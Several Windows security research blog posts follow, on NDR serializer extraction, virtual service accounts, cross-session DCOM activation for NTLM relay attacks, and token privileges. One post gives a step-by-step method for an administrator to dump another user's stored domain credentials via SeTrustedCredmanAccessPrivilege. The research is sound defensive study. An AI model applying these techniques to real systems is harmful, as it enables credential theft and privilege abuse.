I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could manually write the C# parser but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. I'd fortunately already written the feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create a standalone C# type serializer.

First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

interface TypeEncoders
{
    typedef struct _TEST_TYPE
    {
        [unique, string] wchar_t* Name;
        DWORD Value;
    } TEST_TYPE;
}

You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

interface TypeEncoders
{
    typedef [encode, decode] TEST_TYPE;
}

Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), and you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode which serialize (encode) and deserialize (decode) a type from a byte stream. How you use these functions is not really important. We're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers. 
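For reference, driving the generated functions is just a matter of creating a serialization handle over a buffer with the documented Mes* APIs; a rough sketch, assuming the TEST_TYPE example above and with an arbitrarily sized buffer, would be:

#include <windows.h>
#include <midles.h>
// Plus the MIDL-generated header for the IDL file above.

// Encode a TEST_TYPE into a buffer and decode it back out again.
void RoundTrip() {
    alignas(8) static char buffer[1024];
    unsigned long encoded_size = 0;
    handle_t handle = nullptr;

    // Serialize (encode) into the fixed buffer.
    MesEncodeFixedBufferHandleCreate(buffer, sizeof(buffer), &encoded_size, &handle);
    TEST_TYPE value = { const_cast<wchar_t*>(L"Hello"), 42 };
    TEST_TYPE_Encode(handle, &value);
    MesHandleFree(handle);

    // Deserialize (decode) from the same buffer.
    MesDecodeBufferHandleCreate(buffer, encoded_size, &handle);
    TEST_TYPE decoded = {};
    TEST_TYPE_Decode(handle, &decoded);
    MesHandleFree(handle);
}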

If you look at the Decode function when compiled for a X64 target it should look like the following:

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode3(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_ProxyInfo,
         TypePicklingOffsetTable,
         0,
         _pType);
}

The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

The API takes 6 parameters:
  1. The serialization handle, used to maintain state such as the current stream position, and which can be used multiple times to encode or decode more than one structure in a stream.
  2. The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
  3. The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
  4. A list of type offset arrays; these contain the byte offsets into the format string (from the Proxy Info structure) for all type serializers.
  5. The index of the type offset in the 4th parameter.
  6. A pointer to the structure to serialize or deserialize.

Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 serializers. If you compile as 32 bit it will instead use NdrMesType*2 APIs which only support DCE. I'll mention what you need to parse the DCE only APIs later, but for now most things you'll want to extract are going to have a 64 bit build which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to manually write a parser. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004 SHA1:173767EDD6027F2E1C2BF5CFB97261D2C6A95969).

mov     [rsp+28h], r14  ; pObject
mov     dword ptr [rsp+20h], 5 ; nTypeIndex
lea     r9, off_1800F3138 ; ArrTypeOffset
lea     r8, stru_1800D5EA0 ; pProxyInfo
lea     rdx, stru_1800DEAF0 ; pPicklingInfo
mov     rcx, [rsp+68h]  ; Handle
call    NdrMesTypeDecode3

From this we can extract the following values:

MIDL_TYPE_PICKLING_INFO = 0x1800DEAF0
MIDL_STUBLESS_PROXY_INFO = 0x1800D5EA0
Type Offset Array = 0x1800F3138
Type Offset Index = 5

These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

PS> $lib = Import-Win32Module KERBEROS.DLL
PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
     -OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

As long as there was no error from this command the $types variable will now contain the parsed complex types, in this case there'll be more than one. Now you can format them to a C# source code file to use in your application using Format-RpcComplexType.

PS> Format-RpcComplexType $types -Pointer

This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType. This is so that the structures are wrapped inside Unique Pointers. This is the default when using the real RPC runtime, although except for Conformant Structures it isn't strictly necessary. If you don't do this then the decode will typically fail, certainly in this case.

You might notice a serious issue with the generated code, there are no proper structure names. This is unavoidable, the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

In this case there is an alternative to all that. We can use the fact that the official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures and build our own executable with the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface, not only can you avoid having to work out the offsets, as Get-RpcServer will automatically find the location, you can also use an additional feature which extracts type names from your private symbols to fix up the type information.

Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

[
    uuid(4870536E-23FA-4CD5-9637-3F1A1699D3DC),
    version(1.0),
]
interface RpcServer
{
    int Test([in] handle_t hBinding, 
             [unique] PPAC_DEVICE_INFO device_info);
}

Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

// Include the MIDL-generated header for your IDL file here as well.
#include <stdio.h>

#pragma comment(lib, "rpcrt4.lib")

extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
    return new char[size];
}

extern "C" void __RPC_USER MIDL_user_free(void* p) {
    delete[] p;
}

int Test(
    handle_t hBinding,
    PPAC_DEVICE_INFO device_info) {
    printf("Test %p\n", device_info);
    return 0;
}

Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold it with a duplicate function and the type information will be lost, hence we just printf a unique string.

Now parse the RPC server using Get-RpcServer and format the complex types.

PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

Before leaving this topic I should point out how to handle calls to NdrMesType*2 in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode2(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_StubDesc,
         ( PFORMAT_STRING  )&types__MIDL_TypeFormatString.Format[2],
         _pType);
}
  1. The serialization handle.
  2. The MIDL_TYPE_PICKLING_INFO structure.
  3. The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
  4. A pointer into the format string for the start of the type.
  5. A pointer to the structure to serialize or deserialize.
Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

You'll notice that there's an offset into the format string (2 in this case) which you can pass instead of the address in memory. It depends what information your disassembler shows:

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeOffset 2 -Module $lib

Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

Using LsaManageSidNameMapping to add a name to a SID.

I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). Turns out that after a little digging they lead to the same RPC function in LSASS, just through different names:

LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache

and

LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there are two of them and why one is documented but the other not. *shrug*. Of course even though there's an MSDN entry for the function it doesn't seem to actually be documented in the Ntsecapi.h include file *double shrug*. Best documentation I found was this header file.

This got me wondering if I could map all the AppContainer named capabilities via LSASS so that normal applications would resolve them rather than having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly while you can add some SID to name mappings this API won't let you do that for capability SIDs as there are the following calling restrictions:

  1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
  2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
  3. You must register a domain SID's name first to use the SID which includes it.
Basically restriction 2 stops us adding a sub-domain SID for a capability as they use the package security authority (15), and we can't just go straight to adding the SID to name mapping as we need to have registered the domain with the API first; it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

Instead I've just put together a .NET tool to add or remove your own SID to name mappings. It's up on github. The mappings are ephemeral so if you break something rebooting should fix it :-)


Creating your own Virtual Service Accounts

Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer, what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts.

A virtual service account allows you to create an access token where the user SID is a service SID, for example, NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured, which makes them ideal for restricting services, rather than having to deal with the default service accounts and use WSH to lock them down, or specify a domain user with a password.

To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the SID of the account must have its first RID in the range 80 to 111 inclusive. Recall from the previous blog post this is exactly the same range that is covered by LsaManageSidNameMapping.

The LogonUserExEx API only takes strings for the domain and username, you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks). However everything else in the RID range is fair game.

So let's create our own virtual service account. First you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Now before we can log the account in you need to grant it a logon right. This is normally SeServiceLogonRight if you want a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually log in interactively with your virtual account, at least not easily).

If you get the latest version of NtObjectManager (from github at the time of writing) you can use the Add-NtAccountRight command to add the logon type.

PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

Once granted a logon right you can use the Get-NtToken command to logon the account and return a token.

PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
PS> Format-NtToken $token
AWESOME DOMAIN\USER

As you can see we've authenticated the virtual account and got back a token. As we chose to logon as an interactive type the token will also have the INTERACTIVE group assigned. Anyway that's all for now. I guess as there's only a limited number of RIDs available (which is an artificial restriction) MS don't want to document these features even though they could be useful for normal developers.



Standard Activating Yourself to Greatness

This week @decoder_it and @splinter_code disclosed a new way of abusing DCOM/RPC NTLM relay attacks to access remote servers. This relied on the fact that if you're logged in as a user in session 0 (such as through PowerShell remoting) and you call CoGetInstanceFromIStorage, the DCOM activator would create the object in the lowest interactive session rather than in session 0. Once an object is created the initial unmarshal of the IStorage object would happen in the context of the user authenticated to that session. If that happens to be a privileged user such as a Domain Administrator then the NTLM authentication could be relayed to a remote server and fun ensues.

The obvious problem with this attack is the requirement of being in session 0. Certainly it's possible a non-admin user might be allowed to authenticate to a system via PowerShell remoting but it'd be rarer than just being authenticated on a Terminal Server with multiple other users you could attack. It'd be nice if somehow you could pick the session that the object was created on.

Of course this already exists: you can use the session moniker to activate an object cross-session (other than to session 0 which is special). I've abused this feature multiple times for cross-session attacks, such as this, this or this. I've repeatedly told Microsoft they need to fix this activation route as it makes no sense that a non-administrator can do it. But my warnings have not been heeded.

If you read the description of the session moniker you might notice a problem for us, it can't be combined with IStorage activation. The COM APIs only give us one or the other. However, if you poke around at the DCOM protocol documentation you'll notice that they are technically independent. The session activation is specified by setting the dwSessionId field in the SpecialPropertiesData activation property. And the marshalled IStorage object can be passed in the ifdStg field of the InstanceInfoData activation property. You package those activation properties up and send them to the IRemoteSCMActivator RemoteGetClassObject or RemoteCreateInstance methods. Of course it's possible this won't really work, but at least they are independent properties and could be mixed.

The problem with testing this out is that implementing DCOM activation is ugly. The activation properties first need to be NDR marshalled in a blob. They then need to be packaged up correctly before they can be sent to the activator. Also the documentation is only for remote activation, which is not what we want, and there are some weird quirks of local activation I'm not going to go into. Is there any documented way to access the activator without doing all this?

No, sorry. There is an undocumented way though if you're interested? Sure? Okay good, let's carry on. The key with these sorts of challenges is to just look at how the system already does it. Specifically we can look at how the session moniker activates the object and maybe we'll be lucky and can reuse that for our own purposes.

Where to start? If you read this MSDN article you can see you need to call MkParseDisplayNameEx to parse the string into a moniker. But that's really a wrapper over MkParseDisplayName to provide URL moniker functionality which we don't care about. We'll just start at MkParseDisplayName which is in OLE32.

HRESULT MkParseDisplayName(LPBC pbc, LPCOLESTR szUserName, 
      ULONG *pchEaten, LPMONIKER *ppmk) {
  HRESULT hr = FindLUAMoniker(pbc, szUserName, pchEaten, ppmk);
  if (hr == MK_E_UNAVAILABLE) {
    hr = FindSessionMoniker(pbc, szUserName, pchEaten, ppmk);
  }
  // Parse rest of moniker.
}

Almost immediately we see a call to FindSessionMoniker, seems promising. Looking into that function we find what we need.

HRESULT FindSessionMoniker(LPBC pbc, LPCWSTR pszDisplayName, 
                           ULONG *pchEaten, LPMONIKER *ppmk) {
  DWORD dwSessionId = 0;
  BOOL bConsole = FALSE;
  
  if (wcsnicmp(pszDisplayName, L"Session:", 8))
    return MK_E_UNAVAILABLE;

  if (!wcsnicmp(pszDisplayName + 8, L"Console", 7)) {
    bConsole = TRUE;
    *pchEaten = 15;
  } else {
    LPWSTR EndPtr;
    dwSessionId = wcstoul(pszDisplayName + 8, &EndPtr, 0);
    *pchEaten = EndPtr - pszDisplayName;
  }

  *ppmk = new CSessionMoniker(dwSessionId, bConsole);
  return S_OK;
}

This code parses out the session moniker data and then creates a new instance of the CSessionMoniker class. Of course this is not doing any activation yet. You don't use the session moniker in isolation; instead you're supposed to build a composite moniker with a new or class moniker. The MkParseDisplayName API will keep parsing the string (which is why pchEaten is updated) and combine each moniker it finds. Therefore, if you have the moniker display name:

Session:3!clsid:0002DF02-0000-0000-C000-000000000046

The API will return a composite moniker consisting of the session moniker for session 3 and the class moniker for CLSID 0002DF02-0000-0000-C000-000000000046 which is the Browser Broker. The example code then calls BindToObject on the composite moniker, which first calls the right most moniker, which is the class moniker.

HRESULT CClassMoniker::BindToObject(LPBC pbc, 
  LPMONIKER pmkToLeft, REFIID riid, void **ppv) {
  if (pmkToLeft) {
      IClassActivator* pClassActivator;
      pmkToLeft->BindToObject(pbc, nullptr, 
        IID_IClassActivator, (void**)&pClassActivator);
      return pClassActivator->GetClassObject(m_clsid, 
            CLSCTX_SERVER, 0, riid, ppv);
  }
  // ...
}

The pmkToLeft parameter is set by the composite moniker to the left moniker, which is the session moniker. We can see that the class moniker calls the session moniker's BindToObject method requesting an IClassActivator interface. It then calls the GetClassObject method, passing it the CLSID to activate. We're almost there.

HRESULT CSessionMoniker::GetClassObject(
   REFCLSID pClassID, CLSCTX dwClsContext, 
   LCID locale, REFIID riid, void **ppv) {
  IStandardActivator* pActivator;
  CoCreateInstance(CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, 
    IID_IStandardActivator, (void**)&pActivator);

  ISpecialSystemProperties* pSpecialProperties;
  pActivator->QueryInterface(IID_ISpecialSystemProperties, 
      (void**)&pSpecialProperties);
  pSpecialProperties->SetSessionId(m_sessionid, m_console, TRUE);
  return pActivator->StandardGetClassObject(pClassID, dwClsContext, 
                                            NULL, riid, ppv);

}

Finally the session moniker creates a new COM activator object with the IStandardActivator interface. It then queries for the ISpecialSystemProperties interface and sets the moniker's session ID and console state. It then calls the StandardGetClassObject method on the IStandardActivator and you should now have a COM server cross-session. None of these interfaces or the classes are officially documented of course (AFAIK).

The $1000 question is, can you also do IStorage activation through the IStandardActivator interface? Poking around in COMBASE for the implementation of the interface you find one of its functions is:

HRESULT StandardGetInstanceFromIStorage(COSERVERINFO* pServerInfo, 
  REFCLSID pclsidOverride, IUnknown* punkOuter, CLSCTX dwClsCtx, 
  IStorage* pstg, int dwCount, MULTI_QI pResults[]);

It seems that the answer is yes. Of course it's possible that you still can't mix the two things up. That's why I wrote a quick and dirty example in C#, which is available here. Seems to work fine. Of course I've not tested it out with the actual vulnerability to see if it works in that scenario. That's something for others to do.

Dumping Stored Credentials with SeTrustedCredmanAccessPrivilege

I've been going through the various token privileges on Windows trying to find where they're used. One which looked interesting is SeTrustedCredmanAccessPrivilege which is documented as "Access Credential Manager as a trusted caller". The Credential Manager allows a user to store credentials, such as web or domain accounts in a central location that only they can access. It's protected using DPAPI so in theory it's only accessible when the user has authenticated to the system. The question is, what does having SeTrustedCredmanAccessPrivilege grant? I couldn't immediately find anyone who'd bothered to document it, so I guess I'll have to do it myself.

The Credential Manager is one of those features that probably sounded great in the design stage, but does introduce security risks, especially if it's used to store privileged domain credentials, such as for remote desktop access. An application, such as the remote desktop client, can store a domain credential using the CredWrite API, specifying the username and password in the CREDENTIAL structure. The credential type should be set to CRED_TYPE_DOMAIN_PASSWORD.

An application can then access the stored credentials for the current user using APIs such as CredRead or CredEnumerate. However, if the credential type is CRED_TYPE_DOMAIN_PASSWORD the CredentialBlob field, which should contain the password, is always empty. This is an artificial restriction put in place by LSASS, which implements the credential manager RPC service. If a domain credential type is being read then it will never return the password.
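A quick sketch of both calls, with made-up target and account names, shows the behavior: the write succeeds, but reading the credential back returns an empty blob.

#include <windows.h>
#include <wincred.h>
#pragma comment(lib, "advapi32.lib")

// Store a domain credential then read it back. The names are illustrative.
void DomainCredentialRoundTrip() {
    WCHAR password[] = L"Passw0rd!";
    CREDENTIALW cred = {};
    cred.Type = CRED_TYPE_DOMAIN_PASSWORD;
    cred.TargetName = const_cast<LPWSTR>(L"TERMSRV/server.example.com");
    cred.UserName = const_cast<LPWSTR>(L"EXAMPLE\\user");
    cred.CredentialBlob = reinterpret_cast<LPBYTE>(password);
    cred.CredentialBlobSize = sizeof(password) - sizeof(WCHAR); // bytes, no terminator
    cred.Persist = CRED_PERSIST_LOCAL_MACHINE;
    CredWriteW(&cred, 0);

    // Reading it back succeeds, but LSASS blanks the password for this type.
    PCREDENTIALW read_cred = nullptr;
    if (CredReadW(L"TERMSRV/server.example.com", CRED_TYPE_DOMAIN_PASSWORD, 0,
                  &read_cred)) {
        // read_cred->CredentialBlobSize will be 0 here.
        CredFree(read_cred);
    }
}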

How do the domain credentials get used if you can't read the password? Security packages such as NTLM/Kerberos/TSSSP which are running within the LSASS process can use an internal API which doesn't restrict the reading of the domain password. Therefore, when you authenticate to the remote desktop service the target name is used to look up available credentials; if they exist the user will be automatically authenticated.

The credentials are stored in files in the user's profile encrypted with the user's DPAPI key. Why can we not just decrypt the file directly to get the password? When writing the file LSASS sets a system flag in the encrypted blob which makes the DPAPI refuse to decrypt the blob even though it's still under a user's key. Only code running in LSASS can call the DPAPI to decrypt the blob.

If we have administrator privileges getting access to the passwords is trivial. Read the Mimikatz wiki page to understand the various ways that you can use the tool to get access to the credentials. However, it boils down to one of the following approaches:

  1. Patch out the checks in LSASS to not blank the password when read from a normal user.
  2. Inject code into LSASS to decrypt the file or read the credentials.
  3. Just read them from LSASS's memory.
  4. Reimplement DPAPI with knowledge of the user's password to ignore the system flag.
  5. Play games with the domain key backup protocol.
For example, Nirsoft's CredentialsFileView seems to use the injection into LSASS technique to decrypt the DPAPI protected credential files. (Caveat, I've only looked at v1.07 as v1.10 seems to not be available for download anymore, so maybe it's now different. UPDATE: it seems available for download again but Defender thinks it's malware, plus ça change).

At this point you can probably guess that SeTrustedCredmanAccessPrivilege allows a caller to get access to a user's credentials. But how exactly? Looking at LSASRV.DLL, which contains the implementation of the Credential Manager, the privilege is checked in the function CredpIsRpcClientTrusted. This is only called by two APIs, CredrReadByTokenHandle and CredrBackupCredentials, which are exported through the CredReadByTokenHandle and CredBackupCredentials APIs.

The CredReadByTokenHandle API isn't that interesting; it's basically CredRead but allows the user whose credentials are read to be specified by providing that user's token. As far as I can tell reading a domain credential still returns a blank password. CredBackupCredentials on the other hand is interesting. It's the API used by CREDWIZ.EXE to back up a user's credentials, which can then be restored at a later time. This backup includes all credentials including domain credentials. The prototype for the API is as follows:

BOOL WINAPI CredBackupCredentials(HANDLE Token, 
                                  LPCWSTR Path, 
                                  PVOID Password, 
                                  DWORD PasswordSize, 
                                  DWORD Flags);

The backup process is slightly convoluted, first you run CREDWIZ on your desktop and select backup and specify the file you want to write the backup to. When you continue with the backup the process makes an RPC call to your WinLogon process with the credentials path which spawns a new copy of CREDWIZ on the secure desktop. At this point you're instructed to use CTRL+ALT+DEL to switch to the secure desktop. Here you type the password, which is used to encrypt the file to protect it at rest, and is needed when the credentials are restored. CREDWIZ will even ensure it meets your system's password policy for complexity, how generous.

CREDWIZ first stores the backup to a temporary file, as LSASS additionally encrypts the contents with the system DPAPI key. The file can then be decrypted and written to the final destination, with appropriate impersonation etc.

The only requirement for calling this API is having the SeTrustedCredmanAccessPrivilege privilege enabled. Assuming we're an administrator, getting this privilege is easy as we can just borrow a token from another process. For example, checking which processes have the privilege shows obviously WinLogon but also LSASS itself, even though it arguably doesn't need it.

PS> $ts = Get-AccessibleToken
PS> $ts | ? { 
   "SeTrustedCredmanAccessPrivilege" -in $_.ProcessTokenInfo.Privileges.Name 
}
TokenId Access                                  Name
------- ------                                  ----
1A41253 GenericExecute|GenericRead    LsaIso.exe:124
1A41253 GenericExecute|GenericRead     lsass.exe:672
1A41253 GenericExecute|GenericRead winlogon.exe:1052
1A41253 GenericExecute|GenericRead atieclxx.exe:4364

I've literally no idea what the ATIECLXX.EXE process is doing with SeTrustedCredmanAccessPrivilege, it's probably best not to ask ;-)

To use this API to back up a user's credentials as an administrator you do the following:
  1. Open a WinLogon process for PROCESS_QUERY_LIMITED_INFORMATION access and get a handle to its token with TOKEN_DUPLICATE access.
  2. Duplicate token into an impersonation token, then enable SeTrustedCredmanAccessPrivilege.
  3. Open a token to the target user, who must already be authenticated.
  4. Call CredBackupCredentials while impersonating the WinLogon token passing a path to write to and a NULL password to disable the user encryption (just to make life easier). It's CREDWIZ which enforces the password policy not the API.
  5. While still impersonating open the file and decrypt it using the CryptUnprotectData API, write back out the decrypted data.
If it all goes well you'll have all of the user's credentials in a packed binary format. I couldn't immediately find anyone documenting the format, but people obviously have done so before. I'll leave doing all this yourself as an exercise for the reader. I don't feel like providing an implementation.


Why would you do this when there already exist plenty of other options? The main advantage, if you can call it that, is that you never touch LSASS and definitely never inject any code into it, which wouldn't be possible anyway if LSASS is running as PPL. You also don't need to access the SECURITY hive to extract DPAPI credentials or know the user's password (assuming they're authenticated of course). About the only slightly suspicious thing is opening WinLogon to get a token, though there might be alternative approaches to get a suitable token.



The Much Misunderstood SeRelabelPrivilege

Based on my previous blog post I recently had a conversation with a friend and well-known Windows security researcher about token privileges. Specifically, I was musing on how SeTrustedCredmanAccessPrivilege is not a "God" privilege. After some back and forth it seemed we were talking at cross purposes. My concept of a "God" privilege is one which the kernel considers to make a token elevated (see Reading Your Way Around UAC (Part 3)) and so doesn't make it available to any token with an integrity level less than High. They on the other hand consider such a privilege to be one where you can directly compromise a resource or the OS as a whole by having the privilege enabled, this might include privileges which aren't strictly a "God" from the kernel's perspective but can still allow system compromise.

After realizing the misunderstanding I was still surprised that one of the privileges in their list wasn't considered a "God", specifically SeRelabelPrivilege. It seems that there's perhaps some confusion as to what this privilege actually allows you to do, so I thought it'd be worth clearing it up.

Point of pedantry: I don't believe it's correct to say that a resource has an integrity level. It instead has a mandatory label, which is stored in an ACE in the SACL. That ACE contains a SID which maps to an integrity level and a mandatory policy which is stored in the access mask. The combination of integrity level and policy is what determines what access is granted (although you can't grant write up through the policy). The token on the other hand does have an integrity level and a separate mandatory policy, which isn't the same as the one in the ACE. Oddly you specify the value when calling SetTokenInformation using a TOKEN_MANDATORY_LABEL structure, confusing I know.
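To illustrate the token side of that oddity, here's a minimal sketch (hypothetical helper name, error handling omitted) which lowers the current process token's integrity level; even though a token has an integrity level rather than a label, you still fill in a TOKEN_MANDATORY_LABEL structure:

#include <windows.h>
#include <sddl.h>

// Drop the current process token's integrity level to Low.
void LowerTokenToLowIL(void) {
  HANDLE token;
  OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_DEFAULT | TOKEN_QUERY, &token);
  PSID low_il_sid;
  ConvertStringSidToSidW(L"S-1-16-4096", &low_il_sid);  // Low mandatory level SID.
  TOKEN_MANDATORY_LABEL label = { 0 };
  label.Label.Sid = low_il_sid;
  label.Label.Attributes = SE_GROUP_INTEGRITY;
  SetTokenInformation(token, TokenIntegrityLevel, &label, sizeof(label));
  LocalFree(low_il_sid);
  CloseHandle(token);
}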

As with a lot of privileges which don't get used very often the official documentation is not great. You can find the MSDN documentation here. The page is worse than usual as it seems to have been written at a point in the Vista/Longhorn development when the Mandatory Integrity Control (MIC) feature (or as the page calls it, Windows Integrity Control (WIC)) was still in flux. For example, it mentions an integrity level above System, called Installer. Presumably Installer was the initial idea for blocking administrators from modifying system files, which was replaced by using the TrustedInstaller SID as the owner (see previous blog posts). There is a level above System in Vista, called Protected Process, but it's not usable as protected processes were implemented using a different mechanism. 

Distilling what the documentation says the privilege does, it allows for two operations. First it allows you to set the integrity level in a mandatory label ACE to be above the caller's token integrity level. Normally as long as you've been granted WRITE_OWNER access to a resource you can set the label's integrity level to any value less than or equal to the caller's integrity level.

For example, if you try to set the resource's label to System, but the caller is only at High, then the operation fails with the STATUS_INVALID_LABEL error. If you enable SeRelabelPrivilege then the operation will succeed. 
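As a concrete sketch of that first operation, here's roughly what the relabel looks like in code (hypothetical helper name, untested, error handling omitted), assuming handle is a kernel object handle already opened for WRITE_OWNER access and SeRelabelPrivilege is enabled on the caller's token:

#include <windows.h>
#include <sddl.h>
#include <aclapi.h>

// Try to raise an object's mandatory label to System integrity.
DWORD SetSystemLabel(HANDLE handle) {
  PSECURITY_DESCRIPTOR sd = NULL;
  // ML ACE: no-write-up policy, System integrity SID (SI).
  ConvertStringSecurityDescriptorToSecurityDescriptorW(
      L"S:(ML;;NW;;;SI)", SDDL_REVISION_1, &sd, NULL);
  BOOL present = FALSE, defaulted = FALSE;
  PACL sacl = NULL;
  GetSecurityDescriptorSacl(sd, &present, &sacl, &defaulted);
  // LABEL_SECURITY_INFORMATION writes only the mandatory label ACE in the SACL.
  DWORD err = SetSecurityInfo(handle, SE_KERNEL_OBJECT,
                              LABEL_SECURITY_INFORMATION, NULL, NULL, NULL, sacl);
  LocalFree(sd);
  return err;
}

Without the privilege enabled, and a caller below System integrity, the same call should fail with the label error described above.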

Note, the privilege doesn't allow you to raise the integrity level of a token, you need SeTcbPrivilege for that. Without SeTcbPrivilege you can't raise a token's integrity level at all, not even to a value less than or equal to the caller's; the operation can only ever decrease the level in the token.

The second operation is that you can decrease the label. In general you can always decrease the label without the privilege, unless the resource's label is above the caller's. For example you can set the label to Low without any special privilege, as long as you have WRITE_OWNER access on the handle and the current label is less than or equal to the caller's. However, if the label is System and the caller is at High then they can't decrease the label and the privilege is required.

The documentation has this to say (emphasis mine):

"If malicious software is set with an elevated integrity level such as Trusted Installer or System, administrator accounts do not have sufficient integrity levels to delete the program from the system. In that case, use of the Modify an object label right is mandated so that the object can be relabeled. However, the relabeling must occur by using a process that is at the same or a higher level of integrity than the object that you are attempting to relabel."

This is a very confused paragraph. First it indicates that an administrator can't delete a resource with a Trusted Installer or System integrity label and so requires the privilege to relabel it. It then says that the process doing the relabeling must be at a greater or equal integrity level to the object, but if that's the case you don't need the privilege at all. Perhaps the original design of mandatory labels was more sticky, as in maybe you always needed SeRelabelPrivilege to reduce the label regardless of its current value?

At any rate the only user that gets SeRelabelPrivilege by default is SYSTEM, which runs at the System integrity level, already the maximum allowed level, so this aspect of the privilege seems pretty much moot. And as it's a "God" privilege it will be disabled if the token has an integrity level less than High, so the lowering operation is going to be rarely useful.

